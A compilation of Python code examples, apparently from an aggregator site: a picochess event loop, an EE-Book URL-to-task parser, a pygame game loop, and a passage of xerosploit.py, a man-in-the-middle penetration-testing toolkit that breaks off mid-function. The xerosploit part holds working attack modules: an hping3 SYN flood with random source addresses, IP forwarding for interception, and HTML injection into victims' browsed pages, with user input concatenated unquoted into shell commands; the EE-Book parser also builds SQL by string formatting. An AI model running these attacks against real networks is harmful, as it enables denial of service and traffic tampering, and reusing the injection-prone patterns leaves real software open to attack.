                    handle_move(move=event.result.bestmove, ponder=event.result.ponder, inbook=event.inbook)
                    break

                if case(EventApi.NEW_PV):
                    # illegal moves can occur if a pv from the engine arrives at the same time as a user move.
                    if game.is_legal(event.pv[0]):
                        DisplayMsg.show(Message.NEW_PV(pv=event.pv, mode=interaction_mode, fen=game.fen(), turn=game.turn))
                    else:
                        logging.info('illegal move can not be displayed. move:%s fen=%s', event.pv[0], game.fen())
                    break

                if case(EventApi.NEW_SCORE):
                    DisplayMsg.show(Message.NEW_SCORE(score=event.score, mate=event.mate, mode=interaction_mode, turn=game.turn))
                    break

                if case(EventApi.NEW_DEPTH):
                    DisplayMsg.show(Message.NEW_DEPTH(depth=event.depth))
                    break

                if case(EventApi.SET_INTERACTION_MODE):
                    if interaction_mode in (Mode.NORMAL, Mode.OBSERVE, Mode.REMOTE):
                        stop_clock()
                    interaction_mode = event.mode
                    if engine.is_thinking():
                        stop_search()
                    if engine.is_pondering():
                        stop_search()
                    set_wait_state()
                    DisplayMsg.show(Message.INTERACTION_MODE(mode=event.mode, mode_text=event.mode_text, ok_text=event.ok_text))
                    break

                if case(EventApi.SET_OPENING_BOOK):
                    config = ConfigObj('picochess.ini')
                    config['book'] = event.book['file']
                    config.write()
                    logging.debug("changing opening book [%s]", event.book['file'])
                    bookreader = chess.polyglot.open_reader(event.book['file'])
                    DisplayMsg.show(Message.OPENING_BOOK(book_text=event.book_text, ok_text=event.ok_text))
                    break

                if case(EventApi.SET_TIME_CONTROL):
                    time_control = event.time_control
                    config = ConfigObj('picochess.ini')
                    if time_control.mode == TimeMode.BLITZ:
                        config['time'] = '{:d} 0'.format(time_control.minutes_per_game)
                    elif time_control.mode == TimeMode.FISCHER:
                        config['time'] = '{:d} {:d}'.format(time_control.minutes_per_game, time_control.fischer_increment)
                    elif time_control.mode == TimeMode.FIXED:
                        config['time'] = '{:d}'.format(time_control.seconds_per_move)
                    config.write()
                    DisplayMsg.show(Message.TIME_CONTROL(time_text=event.time_text, ok_text=event.ok_text))
                    break

                if case(EventApi.OUT_OF_TIME):
                    stop_search_and_clock()
                    DisplayMsg.show(Message.GAME_ENDS(result=GameResult.OUT_OF_TIME, play_mode=play_mode, game=game.copy()))
                    break

                if case(EventApi.SHUTDOWN):
                    DisplayMsg.show(Message.GAME_ENDS(result=GameResult.ABORT, play_mode=play_mode, game=game.copy()))
                    shutdown(args.dgtpi)
                    break

                if case(EventApi.REBOOT):
                    DisplayMsg.show(Message.GAME_ENDS(result=GameResult.ABORT, play_mode=play_mode, game=game.copy()))
                    reboot()
                    break

                if case(EventApi.EMAIL_LOG):
                    if args.log_file:
                        email_logger = Emailer(net=args.enable_internet, email=args.email, mailgun_key=args.mailgun_key,
                                               smtp_server=args.smtp_server, smtp_user=args.smtp_user,
                                               smtp_pass=args.smtp_pass, smtp_encryption=args.smtp_encryption,
                                               smtp_from=args.smtp_from)
                        body = 'You probably want to forward this file to a picochess developer ;-)'
                        email_logger.send('Picochess LOG', body, '/opt/picochess/logs/{}'.format(args.log_file))
                    break

                if case(EventApi.DGT_BUTTON):
                    DisplayMsg.show(Message.DGT_BUTTON(button=event.button))
                    break

                if case(EventApi.DGT_FEN):
                    DisplayMsg.show(Message.DGT_FEN(fen=event.fen))
                    break

                if case():  # Default
                    logging.warning("event not handled : [%s]", event)

            evt_queue.task_done()

Example 159

Project: EE-Book Source File: url_parser.py
    @staticmethod
    def parse_command(raw_command=''):
        u"""
        分析单条命令并返回待完成的task
        :param raw_command:   网址原始链接, 如:http://blog.sina.com.cn/u/1287694611
        :return: task
        task格式
        *   kind
            *   字符串,见TypeClass.type_list
        *   spider
            *   href
                *   网址原始链接,例http://www.zhihu.com/question/33578941
                *   末尾没有『/』
        *   book
            *   kind
            *   info
            *   question
            *   answer
        """

        def parse_question(command):
            result = Match.question(command)
            question_id = result.group('question_id')
            task = SingleTask()
            task.kind = 'question'

            task.spider.href = 'https://www.zhihu.com/question/{}'.format(question_id)
            task.book.kind = 'question'
            task.book.sql.info = ' question_id = "{}" '.format(question_id)
            task.book.sql.question = 'question_id = "{}"'.format(question_id)
            task.book.sql.answer = 'question_id = "{}"'.format(question_id)
            return task

        def parse_answer(command):
            result = Match.answer(command)
            question_id = result.group('question_id')
            answer_id = result.group('answer_id')
            task = SingleTask()
            task.kind = 'answer'
            task.spider.href = 'https://www.zhihu.com/question/{}/answer/{}'.format(question_id, answer_id)

            task.book.kind = 'answer'
            task.book.sql.info = ' question_id = "{}" '.format(question_id)
            task.book.sql.question = ' question_id = "{}" '.format(question_id)
            task.book.sql.answer = ' question_id = "{}" and answer_id = "{}" '.format(question_id, answer_id)
            return task

        def parse_author(command):
            result = Match.author(command)
            author_id = result.group('author_id')
            task = SingleTask()
            task.kind = 'author'
            task.spider.href = 'https://www.zhihu.com/people/{}'.format(author_id)
            task.book.kind = 'author'

            client = ZhihuClient()
            try:
                client.load_token(Path.pwd_path + str(u'/ZHIHUTOKEN.pkl'))
            except IOError:
                print u"没有找到登录信息文件,请先登录"
                sys.exit()
            except NeedLoginException:
                print u"登录信息过期,请重新登录"
                sys.exit()
            people_oauth = client.people(author_id)
            _ = people_oauth.follower_count    # zhihu-oauth, issues #4
            author_id_hash = people_oauth.id
            task.book.sql.info = 'select * from AuthorInfo where author_id = "{}"'.format(author_id_hash)
            task.book.sql.question = 'select * from Question where question_id in (select question_id from \
            Answer where author_id = "{}")'.format(author_id_hash)
            task.book.sql.answer = 'select * from Answer where author_id = "{}"'.format(author_id_hash)
            return task

        def parse_collection(command):
            result = Match.collection(command)
            collection_id = result.group('collection_id')
            task = SingleTask()
            task.kind = 'collection'
            task.spider.href = 'https://www.zhihu.com/collection/{}'.format(collection_id)
            task.book.kind = 'collection'
            task.book.sql.info = 'select * from CollectionInfo where collection_id = "{}"'.format(
                collection_id
            )
            task.book.sql.question = 'select * from Question where question_id in (select question_id from \
            Answer where href in (select href from CollectionIndex where collection_id = "{}"))'.format(collection_id)
            task.book.sql.answer = 'select * from Answer where href in (select href from \
            CollectionIndex where collection_id = "{}")'.format(collection_id)
            return task

        def parse_topic(command):
            result = Match.topic(command)
            topic_id = result.group('topic_id')
            task = SingleTask()
            task.kind = 'topic'
            task.spider.href = 'https://www.zhihu.com/topic/{}'.format(topic_id)
            task.book.kind = 'topic'
            task.book.sql.info = 'select * from TopicInfo where topic_id = "{}"'.format(topic_id)
            task.book.sql.question = 'select * from Question where question_id in (select question_id from ' + \
                'Answer where href in (select href from TopicIndex where topic_id = "{}"))'.format(topic_id)
            task.book.sql.answer = 'select * from Answer where href in (select href from ' + \
                'TopicIndex where topic_id = "{}")'.format(topic_id)
            return task

        def parse_article(command):
            result = Match.article(command)
            column_id = result.group('column_id')
            article_id = result.group('article_id')
            task = SingleTask()
            task.kind = 'article'
            task.spider.href = 'https://zhuanlan.zhihu.com/{}/{}'.format(column_id, article_id)
            task.book.kind = 'article'
            task.book.sql.info = ' column_id = "{}" and article_id = "{}" '.format(column_id, article_id)
            task.book.sql.question = ''
            task.book.sql.answer = ' column_id = "{}" and article_id = "{}" '.format(column_id, article_id)
            return task

        def parse_column(command):
            result = Match.column(command)
            column_id = result.group('column_id')
            task = SingleTask()
            task.kind = 'column'
            task.spider.href = 'https://zhuanlan.zhihu.com/{}'.format(column_id)
            task.book.kind = 'column'
            task.book.sql.info = 'select * from ColumnInfo where column_id = "{}" '.format(column_id)
            task.book.sql.question = ''
            task.book.sql.answer = 'select * from Article where column_id = "{}" '.format(column_id)
            return task

        def parse_sinablog_author(command):
            u"""

            :param command: 某个新浪博客博主的首页地址
            :return: task:
            """
            result = Match.sinablog_author(command)
            sinablog_author_id = result.group('sinablog_people_id')
            Debug.logger.debug(u"sinablog_people_id:" + str(sinablog_author_id))
            task = SingleTask()

            task.author_id = sinablog_author_id
            task.kind = 'sinablog_author'
            task.spider.href_article_list = 'http://blog.sina.com.cn/s/articlelist_{}_0_1.html'.\
                format(sinablog_author_id)
            task.spider.href = 'http://blog.sina.com.cn/u/{}'.format(sinablog_author_id)
            task.spider.href_profile = 'http://blog.sina.com.cn/s/profile_{}.html'.format(sinablog_author_id)
            task.book.kind = 'sinablog_author'
            task.book.sql.info_extra = 'creator_id = "{}"'.format(sinablog_author_id)
            task.book.sql.article_extra = 'author_id = "{}"'.format(sinablog_author_id)
            task.book.author_id = sinablog_author_id
            return task

        def parse_jianshu_author(command):
            u"""

            :param command: homepage of someone, e.g. http://www.jianshu.com/users/b1dd2b2c87a8/latest_articles
            :return: task:
            """
            result = Match.jianshu_author(command)
            jianshu_id = result.group('jianshu_id')

            task = SingleTask()
            task.author_id = jianshu_id
            task.kind = 'jianshu_author'
            task.spider.href = 'http://www.jianshu.com/users/{}/latest_articles'.format(jianshu_id)
            task.book.kind = 'jianshu_author'
            task.book.sql.info_extra = 'creator_id = "{}"'.format(jianshu_id)
            task.book.sql.article_extra = 'author_id = "{}"'.format(jianshu_id)
            task.book.author_id = jianshu_id
            return task

        def parse_jianshu_collection(command):
            result = Match.jianshu_collection(command)
            collection_id = result.group('collection_id')
            task = SingleTask()
            task.kind = 'jianshu_collection'
            task.spider.href = 'http://www.jianshu.com/collection/{}'.format(collection_id)
            task.book.kind = 'jianshu_collection'
            task.book.sql.info = 'select * from jianshu_collection_info where collection_fake_id = "{}"'.format(
                collection_id
            )
            task.book.sql.answer = 'select * from jianshu_article where href in (select href from ' + \
                'jianshu_collection_index where collection_fake_id = "{}")'.format(collection_id)
            return task

        def parse_jianshu_notebooks(command):
            result = Match.jianshu_notebooks(command)
            notebooks_id = result.group('notebooks_id')
            task = SingleTask()
            task.kind = 'jianshu_notebooks'
            task.spider.href = 'http://www.jianshu.com/notebooks/{}/latest'.format(notebooks_id)  # config file???
            task.book.kind = 'jianshu_notebooks'
            task.book.sql.info = 'select * from jianshu_notebooks_info where notebooks_id = "{}"'.format(
                notebooks_id
            )
            task.book.sql.answer = 'select * from jianshu_article where href in (select href from ' + \
                'jianshu_notebooks_index where notebooks_id = "{}")'.format(notebooks_id)
            return task

        def parse_cnblogs_author(command):
            u"""

            :param command: home page, e.g. http://www.cnblogs.com/buptzym/
            :return:
            """
            result = Match.cnblogs_author(command)
            cnblogs_author_id = result.group('cnblogs_id')
            task = SingleTask()
            task.kind = 'cnblogs_author'
            task.spider.href = 'http://www.cnblogs.com/{}/'.format(cnblogs_author_id)
            task.book.kind = 'cnblogs_author'
            task.book.sql.info = 'select * from cnblogs_author_info where creator_id = "{}"'.format(cnblogs_author_id)
            task.book.sql.answer = 'select * from cnblogs_article where author_id = "{}"'.format(cnblogs_author_id)
            # task.book.sql.info_extra = 'creator_id = "{}"'.format(cnblogs_author_id)
            # task.book.sql.article_extra = 'author_id = "{}"'.format(cnblogs_author_id)
            task.book.author_id = cnblogs_author_id
            return task

        def parse_csdnblog_author(command):
            u"""

            :param command: homepage of someone, e.g. http://blog.csdn.net/elton_xiao
            :return: task
            """
            result = Match.csdnblog_author(command)
            csdnblog_author_id = result.group('csdnblog_author_id')

            task = SingleTask()
            task.author_id = csdnblog_author_id     # ??? don't need?
            task.kind = 'csdnblog_author'
            task.spider.href = 'http://blog.csdn.net/{}'.format(csdnblog_author_id)
            task.book.kind = 'csdnblog_author'
            task.book.sql.info_extra = 'creator_id = "{}"'.format(csdnblog_author_id)
            task.book.sql.article_extra = 'author_id = "{}"'.format(csdnblog_author_id)
            task.book.author_id = csdnblog_author_id
            return task

        def parse_generic(command):
            u"""

            :param command:
            :return:
            """
            from .tools.type import Type
            task = SingleTask()
            for command_type in Type.type_list:
                result = getattr(Match, command_type)(command)
                if result:
                    task.author_id = result.group('subject_id')
                    task.kind = command_type
            task.spider.href = command
            task.book.kind = task.kind
            task.book.sql.info = 'select * from generic_info where creator_id = "{}"'.format(command)
            task.book.sql.answer = 'select * from generic_article where author_id = "{}"'.format(command)
            task.book.author_id = task.spider.href
            return task

        def parse_error(command):
            if command:
                Debug.logger.info(u"""Could not analysis:{}, please check it out and try again。""".format(command))
            return

        parser = {
            'answer': parse_answer,
            'question': parse_question,
            'author': parse_author,
            'collection': parse_collection,
            'topic': parse_topic,
            'article': parse_article,
            'column': parse_column,
            'sinablog_author': parse_sinablog_author,
            'cnblogs_author': parse_cnblogs_author,
            'jianshu_author': parse_jianshu_author,
            'jianshu_collection': parse_jianshu_collection,
            'jianshu_notebooks': parse_jianshu_notebooks,
            'csdnblog_author': parse_csdnblog_author,
            'yiibai': parse_generic,
            'talkpython': parse_generic,
            'unknown': parse_error,
        }

        kind = Match.detect_recipe_kind(raw_command)
        return parser[kind](raw_command)

Example 160

Project: Hermit Source File: foo.py
def main():
	global x, lspds, locs, gamestart, landloc, landni, fullscreen, birds, terrain, keyseq, T
	gamestart = True
	showconsole  = False
	while 1:
		canvas.fill([240,240,240])
		for event in pygame.event.get():
			if event.type == pygame.QUIT: sys.exit()
			man.keyupdowncontrol(event,horse)

			if event.type == pygame.KEYDOWN:
				if showconsole:
					k = pygame.key.name(event.key)
					#print k
					if k == "return":
						exe("".join(keyseq))
						showconsole = False
					elif k == "space":
						keyseq.append(" ")
					elif k == "-":
						keyseq.append("-")
					elif len(k) == 1:
						keyseq.append(k)
					elif event.key == pygame.K_BACKSPACE :
						if len(keyseq) > 0:
							keyseq.pop()

				if event.key == pygame.K_SLASH:
					showconsole = not showconsole
					if showconsole:
						settings.msg = ["CONSOLE READY.",settings.msgt]
					else:
						settings.msg = ["",settings.msgt]
					keyseq = []
				if event.key == pygame.K_f and not showconsole:
					fullscreen = not fullscreen
					if fullscreen:
						pygame.display.set_mode([width/2,height+50],pygame.FULLSCREEN)
					else:
						pygame.display.set_mode([width/2,height+50])
					pygame.display.set_caption("")
		#print(pygame.key.get_pressed())
		for i in range(0,len(Ls)):
			if i == 2:
				for c in cranes:
					c.draw(canvas)
			if i == 3:#+terrain:
				"""
				gfont.s = 10

				gfont.w = 1
				gfont.color = (120,120,120)

				gfont.drawStr(canvas,"Hermit",300-x*0.7,260)

				gfont.s = 5
				gfont.w = 1
				gfont.color = (120,120,120)
				gfont.drawStr(canvas,"by lingdong",450-x*0.7,280)

			"""
				for d in deers:
					d.draw(canvas)

				horse.draw(canvas)
				man.draw(canvas)
				for a in arrows:
					a.draw(canvas)
				for b in birds:
					b.simpDraw(canvas)

				pctrl.draw(canvas)

			if Ls[i] != None:
				canvas.blit(Ls[i],[locs[i]-x*lspds[i]-buff,0])

			if locs[i]-x*lspds[i] < -width-buff:
				locs[i] += width*2
				Ls[i] = None
				thread.start_new_thread(mt,(1, i))


			if Lrs[i] != None:
				canvas.blit(Lrs[i],[locrs[i]-x*lspds[i]-buff,0])

			if locrs[i]-x*lspds[i] < -width-buff:
				locrs[i] += width*2
				Lrs[i] = None
				thread.start_new_thread(mt,(2, i))
		clock.tick()
		T += 1
		u.text(canvas,10,10,"FPS: %.1f" % clock.get_fps(),(160,160,160))

		man.keyholdcontrol()

		if (0 or pygame.key.get_pressed()[pygame.K_RIGHT]) and not man.status[0].endswith("ing"):
			for a in arrows:
				a.x -= SPEED
			for b in birds:
				b.x -= SPEED
			for p in pctrl.particles:
				p.x -= SPEED
			for d in deers:
				d.x-=SPEED*0.5
			for c in cranes:
				c.x-=SPEED
			x+=SPEED
			horse.walk()

			if random.random()<0.0005:
				makeBirds(random.randrange(6,12))
			if random.random() < 0.0005 and terrain[3] == 0:
				makeDeers(1)
			if random.random() < 0.001 and terrain[3] == 1:
				makeCranes(random.randrange(1,5))


		else:
			horse.rest()


		u.polygon(canvas,(130,130,130),[[0,height]]+[[landloc-x+i*landDensity,height-land[i]] for i in range(0,len(land))]+[[width/2,height]])


		if -x+landloc<-landDensity:
			landni += 1
			land.append(makeLand(landni,maxheight=20+terrain[3]*120))
			land.pop(0)
			landloc += landDensity


		man.yo = height-20-onLandY(man.x)
		horse.yo = height-30-onLandY(horse.x)



		for d in deers:

			d.yo = height-30-onLandY(max(min(d.x,width/2),0))

			if noise.noise(T*0.001,deers.index(d))<0.5:
				d.x -= d.spd
				d.walk()
			else:
				d.rest()

			if d.x<-100:
				deers.remove(d)

		for c in cranes:
			c.x -= 2*c.s
			c.fly()
			if c.x<-100:
				cranes.remove(c)


		for a in arrows:
			#a.fly()
			#print(a.x)
			if a.x > width/2 or a.x < -10 or height-onLandY(a.x) >= a.calcHead()[1]:
				a.fly()
			else:
				a.v[0] = 0
				a.v[1] = 0
				a.flicker = 0
			if a.x > width/2:
				arrows.remove(a)

		for b in birds:
			if b.health > 0:
				if ((abs(man.x - b.x) < 100 and random.random()<0.05) or random.random()<0.0002) and b.on == 0:
					b.on = 1
					ra = math.pi/20.0+random.random()*math.pi/6.0*2.1
					rl = random.choice([3,4,5])
					b.v=[rl*math.cos(ra),-rl*math.sin(ra)]
				if b.on == 1:
					b.simpFly()

					if abs(man.x - b.x) > 160 and random.random()<1:
						b.v[1] = min(b.v[1]+0.05,0.4)
					if b.y >= 2:
						b.on = 0

				else:
					b.rest()
					if 0 < b.x < width/2:
						b.yo=height-3-onLandY(b.x)

				for a in arrows:
					#print(u.dist(a.x,a.y,b.x,b.y+b.yo))
					if u.dist(a.x,a.y,b.x,b.y+b.yo) < b.s*30 and a.v[0] > 0:
						a.v[0]/= 2
						b.arrow = a
						b.health = 0
						b.x = a.calcFeather()[0]
						b.y = a.calcFeather()[1] - b.yo
						for i in range(0,12):
							pctrl.particles.append(particle.Particle(a.calcFeather()[0],a.calcFeather()[1],[8*(random.random()-0.5),8*(random.random()-0.3)]))

				if b.x<0 or b.x>width or b.yo<0:
					birds.remove(b)
			else:
				b.fall()
		pctrl.emit()


		man.animate()
		horse.animate()
		#array = []
		#screen.unlock()
		screen.blit(canvas,[0,0])



		reflection = canvas#pygame.transform.flip(canvas,False,True)
		pygame.draw.rect(screen,(180,180,180),[0,height,width/2,50])
		for i in range(0,2*(screen.get_height()-height),2):
			screen.blit(reflection,[(math.sin(i*0.5))*i*0.5+(noise.noise(pygame.time.get_ticks()*0.001,i*0.2)-0.5)*20,height+i-1],(0,height-i,width/2,1))



		if settings.msg[0] != "":
			screen.blit(box,[5,height+33-showconsole*20])
			u.text(screen,10,height+35-showconsole*20,settings.msg[0],(240,240,240))


		if settings.msg[1] <= 0 and not showconsole:
			settings.msg[0] = ""
		else:
			settings.msg[1]-=1

		if showconsole:
			input = "".join(keyseq)
			u.text(screen,10,height+25,">"+input.lower(),(240,240,240))
			u.text(screen,10,height+35," "+" | ".join(parse.parse(input.split("-")[0],commandlist)[:3]),(240,240,240))
		array = [pygame.surfarray.pixels_red(screen),pygame.surfarray.pixels_green(screen),pygame.surfarray.pixels_blue(screen)]
		filter.filter(array,T)
		array = []

		#icon.blit(screen,[0,0],[0,0,512,512])
		#pygame.display.set_icon(icon)
		pygame.display.flip()

Example 161

Project: xerosploit Source File: xerosploit.py
def main():
	try:

#Configure the network interface and gateway. 
		def config0():
			global up_interface
			up_interface = open('/opt/xerosploit/tools/files/iface.txt', 'r').read()
			up_interface = up_interface.replace("\n","")
			if up_interface == "0":
				up_interface = os.popen("route | awk '/Iface/{getline; print $8}'").read()
				up_interface = up_interface.replace("\n","")

			global gateway
			gateway = open('/opt/xerosploit/tools/files/gateway.txt', 'r').read()
			gateway = gateway.replace("\n","")
			if gateway == "0":
				gateway = os.popen("ip route show | grep -i 'default via'| awk '{print $3 }'").read()
				gateway = gateway.replace("\n","")




		def home():

			config0()
			n_name = os.popen('iwgetid -r').read() # Get wireless network name
			n_mac = os.popen("ip addr | grep 'state UP' -A1 | tail -n1 | awk '{print $2}' | cut -f1  -d'/'").read() # Get network mac
			n_ip = os.popen("hostname -I").read() # Local IP address
			n_host = os.popen("hostname").read() # hostname


# Show a random banner. Configured in banner.py .  
			print (xe_header())

			print ("""
[+]═══════════[ Author : @LionSec1 \033[1;36m_-\|/-_\033[1;m Website: lionsec.net ]═══════════[+]

                      [ Powered by Bettercap and Nmap ]""")

			print(""" \033[1;36m
┌═════════════════════════════════════════════════════════════════════════════┐
█                                                                             █
█                         Your Network Configuration                          █ 
█                                                                             █
└═════════════════════════════════════════════════════════════════════════════┘     \n \033[1;m""")

			# Print network configuration , using tabulate as table.

			table = [["IP Address","MAC Address","Gateway","Iface","Hostname"],
					 ["","","","",""],
					 [n_ip,n_mac.upper(),gateway,up_interface,n_host]]
			print (tabulate(table, stralign="center",tablefmt="fancy_grid",headers="firstrow"))
			print ("")



			# Print xerosploits short description , using terminaltables as table. 
			table_datas = [
			    ['\033[1;36m\nInformation\n', 'XeroSploit is a penetration testing toolkit whose goal is to \nperform man in the middle attacks for testing purposes. \nIt brings various modules that allow to realise efficient attacks.\nThis tool is Powered by Bettercap and Nmap.\033[1;m']
			]
			table = DoubleTable(table_datas)
			print(table.table)


		# Get a list of all currently connected devices , using Nmap.
		def scan(): 
			config0()


			scan = os.popen("nmap " + gateway + "/24 -n -sP ").read()

			f = open('/opt/xerosploit/tools/log/scan.txt','w')
			f.write(scan)
			f.close()

			devices = os.popen(" grep report /opt/xerosploit/tools/log/scan.txt | awk '{print $5}'").read()

			devices_mac = os.popen("grep MAC /opt/xerosploit/tools/log/scan.txt | awk '{print $3}'").read() + os.popen("ip addr | grep 'state UP' -A1 | tail -n1 | awk '{print $2}' | cut -f1  -d'/'").read().upper() # get devices mac and localhost mac address

			devices_name = os.popen("grep MAC /opt/xerosploit/tools/log/scan.txt | awk '{print $4 ,S$5 $6}'").read() + "\033[1;32m(This device)\033[1;m"

			
			table_data = [
			    ['IP Address', 'Mac Address', 'Manufacturer'],
			    [devices, devices_mac, devices_name]
			]
			table = DoubleTable(table_data)

			# Show devices found on your network
			print("\033[1;36m[+]═══════════[ Devices found on your network ]═══════════[+]\n\033[1;m")
			print(table.table)
			target_ip()



		# Set the target IP address .
		def target_ip():
			target_parse = " --target " # Bettercap target parse . This variable will be wiped if the user want to perform MITM ATTACK on all the network. 

			print ("\033[1;32m\n[+] Please choose a target (e.g. 192.168.1.10). Enter 'help' for more information.\n\033[1;m")
			target_ips = raw_input("\033[1;36m\033[4mXero\033[0m\033[1;36m ➮ \033[1;m").strip()
			
			if target_ips == "back":
				home()
			elif target_ips == "home":
				home()
			elif target_ips == "":
				print ("\033[1;91m\n[!] Please specify a target.\033[1;m") # error message if no target are specified. 
				target_ip()
			target_name = target_ips

			

#modules section
			def program0():
				
				# I have separed target_ip() and program0() to avoid falling into a vicious circle when the user Choose the "all" option
				cmd_target = os.popen("bash -c 'echo 1 > /proc/sys/net/ipv4/ip_forward'").read() # IP forwarding
				print("\033[1;34m\n[++] " + target_name + " has been targeted. \033[1;m")
				def option():
					""" Choose a module """
					print("\033[1;32m\n[+] Which module do you want to load ? Enter 'help' for more information.\n\033[1;m")
					options = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m\033[1;36m ➮ \033[1;m").strip() # select an option , port scan , vulnerability scan .. etc...
					# Port scanner
					if options == "pscan":
						print(""" \033[1;36m
┌══════════════════════════════════════════════════════════════┐
█                                                              █
█                         Port Scanner                         █
█                                                              █
█      Find open ports on network computers and retrieve       █
█     versions of programs running on the detected ports       █
└══════════════════════════════════════════════════════════════┘     \033[1;m""")
						def pscan():
							

							if target_ips == "" or "," in target_ips:
								print("\033[1;91m\n[!] Pscan : You must specify only one target host at a time .\033[1;m")
								option()
							

							print("\033[1;32m\n[+] Enter 'run' to execute the 'pscan' command.\n\033[1;m")
							action_pscan = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mpscan\033[0m\033[1;36m ➮ \033[1;m").strip()#ip to scan
							if action_pscan == "back":
								option()
							elif action_pscan == "exit":
								sys.exit(exit_msg)	
							elif action_pscan == "home":
								home()

								pscan()
							elif action_pscan == "run": 
								print("\033[1;34m\n[++] Please wait ... Scanning ports on " + target_name + " \033[1;m")
								scan_port = os.popen("nmap "+ target_ips + " -Pn" ).read()

								save_pscan = open('/opt/xerosploit/tools/log/pscan.txt','w') # Save scanned ports result.
								save_pscan.write(scan_port)
								save_pscan.close()

								# Grep port scan information
								ports = os.popen("grep open /opt/xerosploit/tools/log/pscan.txt | awk '{print $1}'" ).read().upper() # open ports
								ports_services = os.popen("grep open /opt/xerosploit/tools/log/pscan.txt | awk '{print $3}'" ).read().upper() # open ports services
								ports_state = os.popen("grep open /opt/xerosploit/tools/log/pscan.txt | awk '{print $2}'" ).read().upper() # port state



								# Show the result of port scan

								check_open_port = os.popen("grep SERVICE /opt/xerosploit/tools/log/pscan.txt | awk '{print $2}'" ).read().upper() # check if all port ara closed with the result
								if check_open_port == "STATE\n": 

									table_data = [
										['SERVICE', 'PORT', 'STATE'],
										[ports_services, ports, ports_state]
									]
									table = DoubleTable(table_data)
									print("\033[1;36m\n[+]═════════[ Port scan result for " + target_ips +" ]═════════[+]\n\033[1;m")
									print(table.table)
									pscan()

								else:
									# if all ports are closed , show error message . 
									print (check_open_port)
									print ("\033[1;91m[!] All 1000 scanned ports on " + target_name + " are closed\033[1;m")
									pscan()
							else:
								print("\033[1;91m\n[!] Error : Command not found.\033[1;m")
								pscan()


						pscan()

			#DoS attack
					elif options == "dos":
						print(""" \033[1;36m
┌══════════════════════════════════════════════════════════════┐
█                                                              █
█                          DoS Attack                          █
█                                                              █
█    Send a succession of SYN requests to a target's system    █
█    to make the system unresponsive to legitimate traffic     █
└══════════════════════════════════════════════════════════════┘     \033[1;m""")
						def dos():
							 
							if target_ips == "" or "," in target_ips:
								print("\033[1;91m\n[!] Dos : You must specify only one target host at a time .\033[1;m")
								option()

							print("\033[1;32m\n[+] Enter 'run' to execute the 'dos' command.\n\033[1;m")
							

							action_dos = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mdos\033[0m\033[1;36m ➮ \033[1;m").strip() 

							if action_dos == "back":
								option()
							elif action_dos == "exit":
								sys.exit(exit_msg)	
							elif action_dos == "home":
								home()
							elif action_dos == "run":
								
								print("\033[1;34m\n[++] Performing a DoS attack to " + target_ips + " ... \n\n[++] Press 'Ctrl + C' to stop.\n\033[1;m")

								dos_cmd = os.system("hping3 -c 10000 -d 120 -S -w 64 -p 21 --flood --rand-source " + target_ips) # Dos command , using hping3
								dos()
							else:
								print("\033[1;91m\n[!] Error : Command not found.\033[1;m")
								dos()
						dos()

			# Ping
					elif options == "ping":
						print(""" \033[1;36m
┌══════════════════════════════════════════════════════════════┐
█                                                              █
█                             Ping                             █
█                                                              █
█               Check the accessibility of devices             █
█     and show how long it takes for packets to reach host     █
└══════════════════════════════════════════════════════════════┘     \033[1;m""") 
						def ping():

							if target_ips == "" or "," in target_ips:
								print("\033[1;91m\n[!] Ping : You must specify only one target host at a time .\033[1;m")
								option()
							
							
							print("\033[1;32m\n[+] Enter 'run' to execute the 'ping' command.\n\033[1;m")

							action_ping = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mping\033[0m\033[1;36m ➮ \033[1;m").strip() 

							if action_ping == "back":
								option()
							elif action_ping == "exit":
								sys.exit(exit_msg)	
							elif action_ping == "home":
								home()
							elif action_ping == "run":
								print("\033[1;34m\n[++] PING " + target_ips + " (" + target_ips + ") 56(84) bytes of data ... \n\033[1;m")
								ping_cmd = os.popen("ping -c 5 " + target_ips).read()
								fping = open('/opt/xerosploit/tools/log/ping.txt','w') #Save ping result , then grep some informations.
								fping.write(ping_cmd)
								fping.close()

								ping_transmited = os.popen("grep packets /opt/xerosploit/tools/log/ping.txt | awk '{print $1}'").read()
								ping_receive = os.popen("grep packets /opt/xerosploit/tools/log/ping.txt | awk '{print $4}'").read()
								ping_lost = os.popen("grep packets /opt/xerosploit/tools/log/ping.txt | awk '{print $6}'").read()
								ping_time = os.popen("grep packets /opt/xerosploit/tools/log/ping.txt | awk '{print $10}'").read()

								table_data = [
				    				['Transmitted', 'Received', 'Loss','Time'],
				    				[ping_transmited, ping_receive, ping_lost, ping_time]
								]
								table = DoubleTable(table_data)
								print("\033[1;36m\n[+]═════════[ " + target_ips +" ping statistics  ]═════════[+]\n\033[1;m")
								print(table.table)
								ping()
							else:
								print("\033[1;91m\n[!] Error : Command not found.\033[1;m")
								ping()

						ping()

					elif options == "injecthtml":
						print(""" \033[1;36m
┌══════════════════════════════════════════════════════════════┐
█                                                              █
█                         Inject Html                          █
█                                                              █
█           Inject Html code in all visited webpage            █
└══════════════════════════════════════════════════════════════┘     \033[1;m""")
						def inject_html():
							print("\033[1;32m\n[+] Enter 'run' to execute the 'injecthtml' command.\n\033[1;m")
							action_inject = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4minjecthtml\033[0m\033[1;36m ➮ \033[1;m").strip() 
							if action_inject == "back":
								option()
							elif action_inject == "exit":
								sys.exit(exit_msg)	
							elif action_inject == "home":
								home()
							elif action_inject == "run":
								print("\033[1;32m\n[+] Specify the file containing html code you would like to inject.\n\033[1;m")
								html_file = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mInjecthtml\033[0m\033[1;36m ➮ \033[1;m")
								
								if html_file == "back":
									inject_html()
								elif html_file == "home":
									home()
								else:

									html_file = html_file.replace("'","")
									print("\033[1;34m\n[++] Injecting Html code ... \033[1;m")
									print("\033[1;34m\n[++] Press 'Ctrl + C' to stop . \n\033[1;m")
									cmd_code = os.system("cp " + html_file + " /opt/xerosploit/tools/bettercap/modules/tmp/file.html")
									cmd_inject = os.system("xettercap " + target_parse + target_ips + " --proxy-module=/opt/xerosploit/tools/bettercap/lib/bettercap/proxy/http/modules/injecthtml.rb --js-file " + html_file + " -I " + up_interface + " --gateway " + gateway )

